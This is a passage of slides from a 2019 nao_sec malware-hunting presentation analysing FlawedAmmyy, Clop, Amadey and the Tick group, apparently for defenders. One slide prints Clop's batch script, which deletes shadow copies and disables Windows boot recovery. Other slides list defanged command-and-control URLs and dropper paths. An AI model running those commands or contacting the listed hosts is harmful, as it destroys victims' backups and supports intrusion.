![Page 71: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/71.jpg)
Copyright©2019 nao_sec All Rights Reserved.
FlawedAmmyy
• Use custom packer
71
![Page 72: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/72.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Clop
• signed
72
![Page 73: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/73.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Clop
• same custom packeras FlawedAmmyy
73
![Page 74: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/74.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Clop
• run only as a service• In other words, service installation is supposed to use other methods
• It is mentioned in the report of KRCERT
74
![Page 75: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/75.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Clop
• Decode Resource data• bat file
• ransom note
@echo offvssadmin Delete Shadows /all /quietvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MBvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unboundedvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MBvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unboundedvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MBvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unboundedvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MBvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unboundedvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MBvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unboundedvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MBvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unboundedbcdedit /set {default} recoveryenabled Nobcdedit /set {default} bootstatuspolicy ignoreallfailuresvssadmin Delete Shadows /all /quiet
75
![Page 76: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/76.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Amadey
• Amadey is installed by msiexec.exe when you open a malicious excel file
https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784/
76
![Page 77: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/77.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Amadey
• Same custom packer as FlawedAmmyy and Clop
77
![Page 78: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/78.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Amadey
• Luckily, it has symbol information
• Multifunctional bot• Download and execute next payload
• Gathering environmental information
• Bypass UAC
• Check Avs
• etc…
78
![Page 79: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/79.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Amadey
• some interesting encoded strings• C2 domain
• C2 parameter
• drop name and directory name
• Check Avs name
• AutoRun command
79
![Page 80: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/80.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Summary
• Excel 4.0 • Defense Evasion
• Install malware using msiexec.exe • T1218
• Signed malware• T1116
• Custom packer• T1140
• Used for packing multiple malware families
80
![Page 81: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/81.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Tick
81
![Page 82: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/82.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Tick
• other name• BRONZE BUTLER
• tick is Chinese origins group that has been active since at 2008
• It targets Japan and Korea
82
![Page 83: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/83.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[Pattern2] 2019-02
extract
Drop
%temp%¥taskmar.exe
Word Open
%APPDATA%¥Microsoft¥Word¥Startup¥winhelp.wll
C2
Drop
https[:]//www.86coding.com//flow//index.php
https[:]//www.86coding.com//img//flow//img00.jpg
83
![Page 84: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/84.jpg)
Copyright©2019 nao_sec All Rights Reserved.
RTF
• Extensions and icons mimic doc format
• It has OLE object---+----------+---------------------------------------------------------------id |index |OLE Object---+----------+---------------------------------------------------------------0 |0005EBBDh |format_id: 2 (Embedded)| |class name: 'Package'| |data size: 1673928| |OLE Package object:| |Filename: u'8.t'| |Source path: u'C:¥¥Aaa¥¥tmp¥¥8.t'| |Temp path = u'C:¥¥Users¥¥ADMINI~1¥¥AppData¥¥Local¥¥Temp¥¥8.t'| |MD5 = '026dbdbb1e525ce4b86734fa08be513d'---+----------+---------------------------------------------------------------
84
![Page 85: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/85.jpg)
Copyright©2019 nao_sec All Rights Reserved.
RTF
• Dummy content mimics a real company
85
![Page 86: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/86.jpg)
Copyright©2019 nao_sec All Rights Reserved.
DLL
• winhelp.wll• word Add-In
• %APPDATA%¥Microsoft¥Word¥Startup• Execute when open the Word application
• It has pdb infomation• C:¥Users¥Frank¥Desktop¥doc_dll¥Release¥DocDll.pdb
86
![Page 87: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/87.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• %temp%¥taskmar.exe• File size is very large
• about 78MB
• self copy 1024 times
• It has PDB information• C:¥Users¥Frank¥Desktop¥ABK-old¥Release¥ABK.pdb
87
![Page 88: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/88.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• Similar code with the same logicas Pattern1
88
![Page 89: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/89.jpg)
Copyright©2019 nao_sec All Rights Reserved.
C2
http[:]//www.ishuiyunjian.com/source/include/post/index.phphttp[:]//www.ishuiyunjian.com/source/include/post/post.jpg
Has dummy PDF
[Pattern3] 2019-01
89
![Page 90: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/90.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• It has dummy PDF in resource area• Named “EXE"
90
![Page 91: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/91.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• It has config in resource area
91
![Page 92: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/92.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• There is no big change, but it is different in some codes• maybe update?
92
![Page 93: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/93.jpg)
Copyright©2019 nao_sec All Rights Reserved.
[Pattern4] 2019-05
%temp%¥taskhast.exe
C2
http[:]//www.carilite.net//Coolbee//coolbee.bmp
http[:]//www.carilite.net//Coolbee//index.php
93
![Page 94: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/94.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Dropper
• Strings Table• only “Folder”
• It has PDB information• C:¥Users¥Frank¥Desktop¥ABK¥Release¥Hidder.pdb
94
![Page 95: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/95.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• Change Check Avs
95
![Page 96: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/96.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• Hardcode unique URLs(“//”) and Parameters• Several parameters were added
• id=078BFBFF000406F1564309220&group=0&class=6
• It has PDB information• C:¥Users¥Frank¥Documents¥Visual Studio 2010¥Projects¥avenger¥Release¥avenger.pdb
96
![Page 97: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/97.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Downloader
• Download dummy bmp• It contains Chinese notepad.exe named winlogon.exe
• %appdata%¥ ¥Microsoft¥Internet Explorer
• The implant exe is encoded
97
![Page 98: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/98.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Summary
• exe using RLO• T1036
• Targeted advanced decoy files
• Binary padding• T1009
• exe implant to image file• They prefer Windows default wallpaper
• Use original downloader and rat• ABK Downloader
• Datper
114
![Page 99: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/99.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Summary
115
![Page 100: Copyright©2019 nao sec All Rights Reserved. · 1.Send E-mail with attached (Excel) file from Cutwail Botnet 2.Macro runs when opening Excel file 3.Processing transition from macro](https://reader033.vdocument.in/reader033/viewer/2022050118/5f4f07fb836cd62ff01655ce/html5/thumbnails/100.jpg)
Copyright©2019 nao_sec All Rights Reserved.
Summary
• Services and methods used for Hunting• VirusTotal
• Private API• Yara (Live & Retro Hunt)
• Hybrid Analysis• Yara (Retro Hunt)• ATT&CK Tactic & Technique
• ANY.RUN• ATT&CK Technique• Suricata SID
• Actors TTPs found from public sources• TA544• Gorgon Group• OceanLotus• TA505• Tick
116